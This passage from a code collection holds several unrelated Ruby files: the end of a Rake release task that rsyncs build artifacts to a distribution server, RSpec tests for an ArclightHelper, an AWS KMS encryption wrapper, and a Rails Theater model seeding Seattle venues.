remote_ssh_cmd(Pkg::Config.distribution_server, "mkdir -p #{artifact_dir}")
end
retry_on_fail(:times => 3) do
ignore_existing = "--ignore-existing"
rsync_to("pkg/", Pkg::Config.distribution_server, "#{artifact_dir}/ #{ignore_existing} --exclude repo_configs")
end
# If we just shipped a tagged version, we want to make it immutable
files = Dir.glob("pkg/**/*").select { |f| File.file?(f) }.map do |file|
"#{artifact_dir}/#{file.sub(/^pkg\//,'')}"
end
remote_set_immutable(Pkg::Config.distribution_server, files)
end
desc "Ship generated repository configs to the distribution server"
task :ship_repo_configs do
Pkg::Util::File.empty_dir?("pkg/repo_configs") and fail "No repo configs have been generated! Try pl:deb_repo_configs or pl:rpm_repo_configs"
invoke_task("pl:fetch")
repo_dir = "#{Pkg::Config.jenkins_repo_path}/#{Pkg::Config.project}/#{Pkg::Config.ref}/repo_configs"
remote_ssh_cmd(Pkg::Config.distribution_server, "mkdir -p #{repo_dir}")
retry_on_fail(:times => 3) do
rsync_to("pkg/repo_configs/", Pkg::Config.distribution_server, repo_dir)
end
end
end
end
| 43.984456 | 179 | 0.673813 |
39019a6dca2bfa363579fea8378aac40abd704fc | 13,823 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ArclightHelper, type: :helper do
describe '#collection_active?' do
context 'with active collection search' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'f' => { 'level_sim' => ['Collection'] } }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.collection_active?).to eq true
end
end
context 'without active collection search' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: {}
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.collection_active?).to eq false
end
end
end
describe '#grouped?' do
context 'when group is active' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'group' => 'true' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.grouped?).to be_truthy
end
end
context 'when not grouped' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'hello' => 'true' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.grouped?).to be_falsey
end
end
end
describe '#search_with_group' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'q' => 'hello', 'page' => '2' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.search_with_group).to eq(
'q' => 'hello',
'group' => 'true'
)
end
end
describe '#search_without_group' do
let(:search_state) do
instance_double(
'Blacklight::SearchState',
params_for_search: { 'q' => 'hello', 'group' => 'true', 'page' => '2' }
)
end
before do
allow(helper).to receive(:search_state).and_return(search_state)
end
it do
expect(helper.search_without_group).to eq(
'q' => 'hello'
)
end
end
describe '#on_repositories_index?' do
before { allow(helper).to receive(:action_name).twice.and_return('index') }
context 'with repositories index' do
it do
allow(helper).to receive(:controller_name).twice.and_return('repositories')
expect(helper.on_repositories_index?).to eq true
expect(helper.repositories_active_class).to eq 'active'
end
end
context 'without repositories index' do
it do
allow(helper).to receive(:controller_name).twice.and_return('NOT repositories')
expect(helper.on_repositories_index?).to eq false
expect(helper.repositories_active_class).to eq nil
end
end
end
describe '#on_repositories_show?' do
before { allow(helper).to receive(:action_name).twice.and_return('show') }
context 'with repositories show' do
it do
allow(helper).to receive(:controller_name).twice.and_return('repositories')
expect(helper.on_repositories_show?).to eq true
expect(helper.repositories_active_class).to eq nil
end
end
context 'without repositories show' do
it do
allow(helper).to receive(:controller_name).twice.and_return('NOT repositories')
expect(helper.on_repositories_show?).to eq false
expect(helper.repositories_active_class).to eq nil
end
end
end
describe '#collection_count' do
context 'when there are items' do
it 'returns the item count from the Blacklight::Solr::Response' do
assign(:response, instance_double('Response', response: { 'numFound' => 2 }))
expect(helper.collection_count).to eq 2
end
end
context 'when there are no items' do
it do
assign(:response, instance_double('Response', response: {}))
expect(helper.collection_count).to be_nil
end
end
end
describe '#fields_have_content?' do
before do
expect(helper).to receive_messages(
blacklight_config: CatalogController.blacklight_config,
blacklight_configuration_context: Blacklight::Configuration::Context.new(helper)
)
end
context 'when the configured fields have content' do
let(:document) { SolrDocument.new('acqinfo_ssm': ['Data']) }
it 'is true' do
expect(helper.fields_have_content?(document, :background_field)).to eq true
end
end
context 'when the configured fields have no content' do
let(:document) { SolrDocument.new }
it 'is true' do
expect(helper.fields_have_content?(document, :background_field)).to eq false
end
end
end
describe '#parents_to_links' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'converts "parents" from SolrDocument to links' do
expect(helper.parents_to_links(document)).to include 'my repository'
expect(helper.parents_to_links(document)).to include 'DEF'
expect(helper.parents_to_links(document)).to include solr_document_path('abc123def')
expect(helper.parents_to_links(document)).to include 'GHI'
expect(helper.parents_to_links(document)).to include solr_document_path('abc123ghi')
end
it 'properly delimited' do
expect(helper.parents_to_links(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.parents_to_links(SolrDocument.new)).not_to include '»'
end
end
describe '#component_parents_to_links' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi jkl],
parent_unittitles_ssm: %w[DEF GHI JKL],
ead_ssi: 'abc123'
)
end
it 'converts component "parents" from SolrDocument to links' do
expect(helper.component_parents_to_links(document)).not_to include 'DEF'
expect(helper.component_parents_to_links(document)).not_to include solr_document_path('abc123def')
expect(helper.component_parents_to_links(document)).to include 'GHI'
expect(helper.component_parents_to_links(document)).to include solr_document_path('abc123ghi')
end
it 'properly delimited' do
expect(helper.component_parents_to_links(document)).to include '<span aria-hidden="true"> » </span>'
end
end
describe '#regular_compact_breadcrumbs' do
context 'when the component only has one parent (meaning it is a top level parent)' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def],
parent_unittitles_ssm: %w[DEF],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'links to repository and top level component and does not include an ellipsis' do
expect(helper.regular_compact_breadcrumbs(document)).to include 'my repository'
expect(helper.regular_compact_breadcrumbs(document)).to include 'DEF'
expect(helper.regular_compact_breadcrumbs(document)).to include solr_document_path('abc123def')
expect(helper.regular_compact_breadcrumbs(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.regular_compact_breadcrumbs(document)).not_to include '…'
end
end
context 'when the component is a child of a top level component' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123',
repository_ssm: 'my repository'
)
end
it 'links to the top level component and does include an ellipsis' do
expect(helper.regular_compact_breadcrumbs(document)).to include 'DEF'
expect(helper.regular_compact_breadcrumbs(document)).to include solr_document_path('abc123def')
expect(helper.regular_compact_breadcrumbs(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.regular_compact_breadcrumbs(document)).to include '…'
end
end
end
describe '#component_top_level_parent_to_links' do
context 'when the component only has one parent (meaning it is a top level parent)' do
let(:document) do
SolrDocument.new(parent_ssm: %w[def], parent_unittitles_ssm: %w[DEF], ead_ssi: 'abc123')
end
it { expect(helper.component_top_level_parent_to_links(document)).to be_nil }
end
context 'when the component is a child of a top level component' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi],
parent_unittitles_ssm: %w[DEF GHI],
ead_ssi: 'abc123'
)
end
it 'links to the top level component and does not include an ellipsis' do
expect(helper.component_top_level_parent_to_links(document)).to include 'GHI'
expect(helper.component_top_level_parent_to_links(document)).to include solr_document_path('abc123ghi')
expect(helper.component_top_level_parent_to_links(document)).not_to include '»'
expect(helper.component_top_level_parent_to_links(document)).not_to include '…'
end
end
context 'when the component is several levels deep' do
let(:document) do
SolrDocument.new(
parent_ssm: %w[def ghi jkl],
parent_unittitles_ssm: %w[DEF GHI JKL],
ead_ssi: 'abc123'
)
end
it 'links to the top level component and joins it with an ellipsis' do
expect(helper.component_top_level_parent_to_links(document)).to include 'GHI'
expect(helper.component_top_level_parent_to_links(document)).to include solr_document_path('abc123ghi')
expect(helper.component_top_level_parent_to_links(document)).to include '<span aria-hidden="true"> » </span>'
expect(helper.component_top_level_parent_to_links(document)).to include '…'
end
end
end
describe '#search_results_header_text' do
let(:text) { helper.search_results_header_text }
context 'when searching within a repository' do
before do
expect(helper).to receive_messages(
repository_faceted_on: instance_double('Arclight::Repostory', name: 'Repository Name')
)
end
it { expect(text).to eq 'Collections : [Repository Name]' }
end
context 'when searching all collections' do
before do
expect(helper).to receive_messages(
search_state: instance_double(
'Blacklight::SearchState', params_for_search: { 'f' => { 'level_sim' => ['Collection'] } }
),
facet_field_in_params?: false
)
end
it { expect(text).to eq 'Collections' }
end
context 'all other non-special search behavior' do
it { expect(text).to eq 'Search' }
end
end
describe 'document_or_parent_icon' do
let(:document) { SolrDocument.new('level_ssm': ['collection']) }
it 'properly assigns the icon' do
expect(helper.document_or_parent_icon(document)).to eq 'collection'
end
context 'there is no level_ssm' do
let(:document) { SolrDocument.new }
it 'gives the default icon' do
expect(helper.document_or_parent_icon(document)).to eq 'container'
end
end
end
describe 'custom field accessors' do
let(:accessors) { Arclight::Engine.config.catalog_controller_field_accessors }
let(:field) { :yolo }
describe '#document_config_fields' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"document_#{accessor}s"
end
end
end
describe '#render_document_config_field_label' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"render_document_#{accessor}_label"
end
end
end
describe '#document_config_field_label' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"document_#{accessor}_label"
end
end
end
describe '#should_render_config_field?' do
it do
accessors.each do |accessor|
expect(helper).to respond_to :"should_render_#{accessor}?"
end
end
end
describe '#generic_document_fields' do
it 'send along the method call' do
expect(helper).to receive_messages(document_yolos: nil)
helper.generic_document_fields(field)
end
end
describe '#generic_should_render_field?' do
it 'send along the method call' do
expect(helper).to receive_messages(should_render_yolo?: nil)
helper.generic_should_render_field?(field, 0, 1)
end
end
describe '#generic_render_document_field_label?' do
it 'send along the method call' do
expect(helper).to receive_messages(render_document_yolo_label: nil)
helper.generic_render_document_field_label(field, 0, field: 1)
end
end
end
describe '#hierarchy_component_context?' do
it 'requires a parameter to enable' do
allow(helper).to receive(:params).and_return(hierarchy_context: 'component')
expect(helper.hierarchy_component_context?).to be_truthy
end
it 'omission is disabled' do
allow(helper).to receive(:params).and_return({})
expect(helper.hierarchy_component_context?).to be_falsey
end
end
end
| 32.833729 | 117 | 0.662808 |
b9e1bf1344f82f4b8251a43827cc2aa7aa3c6b8e | 1,278 | module BuildComms
class KMS
class << self
def client
@client || @client = Aws::KMS::Client.new
end
def get_key key, context=nil
opts = {
:key_id => "alias/#{key}",
:key_spec => "AES_256"
}
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
response = client.generate_data_key(opts)
{ :enc_key => Base64.strict_encode64(response.ciphertext_blob), :key => response.plaintext }
end
def encrypt key, data, context=nil
opts = {
:key_id => "alias/#{key}",
:plaintext => data
}
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
Base64.strict_encode64(client.encrypt(opts).ciphertext_blob)
end
def decrypt data, context=nil
opts = { :ciphertext_blob => Base64.strict_decode64(data) }
if !context.nil?
opts[:encryption_context] = to_hash(context)
end
client.decrypt(opts).plaintext
end
private
def to_hash val
if !val.is_a?(Hash)
val = { :context => val }
end
Hash[val.map{ |k, v| [k.to_s, v.to_s] }]
end
end
end
end
| 22.034483 | 100 | 0.535211 |
268462b7b2678dff746ffe9ac138e993c5e17407 | 1,331 | class Theater < ApplicationRecord
has_many :shows
def self.create_theaters
Theater.destroy_all # delete this line later
paramount = Theater.new
paramount.location = "911 Pine St, Seattle, WA 98101"
paramount.name = "The Paramount Theater"
paramount.klass = "Paramount"
paramount.save
paramount.updated_at = Time.now.utc - 90000
paramount.save
the5th = Theater.new
the5th.location = "1308 5th Ave, Seattle, WA 98101"
the5th.name = "The 5th Avenue Theater"
the5th.klass = "TheFifthAvenueTheater"
the5th.save
the5th.updated_at = Time.now.utc - 90000
the5th.save
sct = Theater.new
sct.location = "201 Thomas St, Seattle, WA 98109"
sct.name = "Seattle Children's Theater"
sct.klass = "SeattleChildrensTheater"
sct.save
sct.updated_at = Time.now.utc - 90000
sct.save
end
def self.find_by_name(name)
find_by(name: name)
end
def self.scrape
end
def self.find_by_name(name)
self.all.detect {|theater| theater.name == name}
end
def get_shows_by_name
shows.map {|show| show.name}
end
def get_shows_by_month(month)
self.shows.map {|show| array << show if show.show_month_includes?(month)}
end
end
# maybe add find or create theaters so that they don't have to be manually loaded in case of new db?
| 23.350877 | 100 | 0.691961 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.